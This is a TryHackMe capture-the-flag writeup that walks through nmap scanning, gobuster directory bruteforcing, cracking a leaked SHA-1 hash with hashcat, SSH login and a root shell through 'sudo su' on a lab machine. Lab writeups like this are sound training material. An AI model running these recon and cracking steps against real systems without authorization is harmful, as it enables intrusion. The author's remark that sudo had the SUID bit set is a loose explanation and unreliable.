TryHackMe - CC Pentest Final Exam Writeup

Oct 21, 2020 Writeup

Intro

This writeup is THM’s CC:Pentest Room’s Final Exam’s walkthrough which can be found here. The objective is to figure out the user flag and root flag.

Tools used: Nmap, Gobuster, Hashcat, Privilege Escalation.

Analysis

Nmap

For information gathering and enumeration, I started off with an NMAP stealth scan.

nmap -p- -v --min-parallelism 100 -sV 10.10.24.168

Here, -p- scans all 65,535 ports, -v is a verbose flag, –min-parallelism probes parallelism to speed up the scan and -sV shows the version of services running on the target IP.

The results of the scan returned as follows

Nmap scan report for 10.10.24.168
Host is up (0.31s latency).
Not shown: 65532 closed ports
PORT      STATE    SERVICE VERSION
22/tcp    open     ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp    open     http    Apache httpd 2.4.18 ((Ubuntu))
62157/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

So there’s 2 ports open with SSH and Apache. We’ll come back to this later, if needed.

GoBuster

Gobuster is a directory bruteforcing tool that will search for hidden directories on the port 80 web server. Let’s run the code below to see what it outputs

gobuster dir -u 10.10.24.168 -w /usr/share/seclists/Discovery/Web-Content/common.txt

The output was

===============================================================
2020/10/21 22:27:08 Starting gobuster
===============================================================
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/index.html (Status: 200)
/secret (Status: 301)
/server-status (Status: 403)
===============================================================
2020/10/21 22:31:48 Finished
===============================================================

Aha! There’s a directory called ‘secret’ on the server. However, there’s nothing displayed if I visit it and nothing interesting in the source too. So I had to run gobuster on it again under that directory.

gobuster dir -u 10.10.24.168/secret -w /usr/share/seclists/Discovery/Web-Content/common.txt

And this time I found

/index.html (Status: 200)

Nothing again, but the hint says check for different extensions so let’s check with other extensions like .txt.

gobuster dir -u 10.10.24.168/secret -w /usr/share/seclists/Discovery/Web-Content/common.txt -x .txt

This shows a ‘secret.txt’ file. When I open this, I see

nyan:046385855FC9580393853D8E81F240B66FE9A7B8

Which seem like the credentials for the SSH client from the earlier NMAP scan. Let’s use this to connect to the SSH server.

ssh nyan@10.10.24.168

But if I use the default password seen above, it doesn’t work. As I suspected, this password is hashed. So I used hashid to verify the hash being used.

hashid 046385855FC9580393853D8E81F240B66FE9A7B8

And the results pointed it out to be SHA-1

To crack this, let’s use hashcat as below.

hashcat -m 100 hash /usr/share/wordlists/rockyou.txt --force

The -m flag sets the mode to 100 which pertains to SHA-1 and hash is a text file I stored the hash digest in.

The results of this crack were as follows:

046385855fc9580393853d8e81f240b66fe9a7b8:[redacted]
Session..........: hashcat
Status...........: Cracked
Hash.Name........: SHA1
Hash.Target......: 046385855fc9580393853d8e81f240b66fe9a7b8
Time.Started.....: Wed Oct 21 23:00:00 2020, (1 sec)
Time.Estimated...: Wed Oct 21 23:00:01 2020, (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  3480.8 kH/s (0.57ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 4972544/14344385 (34.67%)
Rejected.........: 0/4972544 (0.00%)
Restore.Point....: 4964352/14344385 (34.61%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: o103192 -> nwcfleshwound

Success! The SSH password is as seen above next to the hash. Let’s use that to login to the SSH server.

User

After logging in, running ls gives us the user flag.

nyan@ubuntu:~$ ls
user.txt
nyan@ubuntu:~$ cat user.txt
[redacted]
nyan@ubuntu:~$

Now onto the root flag!

If I run

nyan@ubuntu:~$ ls -latr
total 36
drwxr-xr-x 3 root root 4096 Dec 20  2019 ..
-rw-r--r-- 1 nyan nyan  655 Dec 20  2019 .profile
-rw-r--r-- 1 nyan nyan 3771 Dec 20  2019 .consolerc
-rw-r--r-- 1 nyan nyan  220 Dec 20  2019 .console_logout
drwx------ 2 nyan nyan 4096 Dec 20  2019 .cache
-rw-r--r-- 1 nyan nyan    0 Dec 20  2019 .sudo_as_admin_successful
drwxrwxr-x 2 nyan nyan 4096 Dec 20  2019 .nano
-rw-rw-r-- 1 nyan nyan   14 Dec 20  2019 user.txt
-rw------- 1 nyan nyan   16 Dec 20  2019 .console_history
drwxr-xr-x 4 nyan nyan 4096 Dec 20  2019 .

Root

There’s a hidden file, console_history, opening it, I saw 3 lines of previous history.

su
sudo su
exit

When I run the second line, I successfully entered root. It seems that sudo had the SUID bit set on it.

nyan@ubuntu:~$ sudo su
root@ubuntu:/home/nyan# whoami
root
root@ubuntu:/home/nyan#

And so

root@ubuntu:/home/nyan# cd ../..
root@ubuntu:/# cd root
root@ubuntu:~# ls
root.txt
root@ubuntu:~# cat root.txt
[redacted]

We have successfully found the root flag and thereby finished this exam.

Thanks for following along.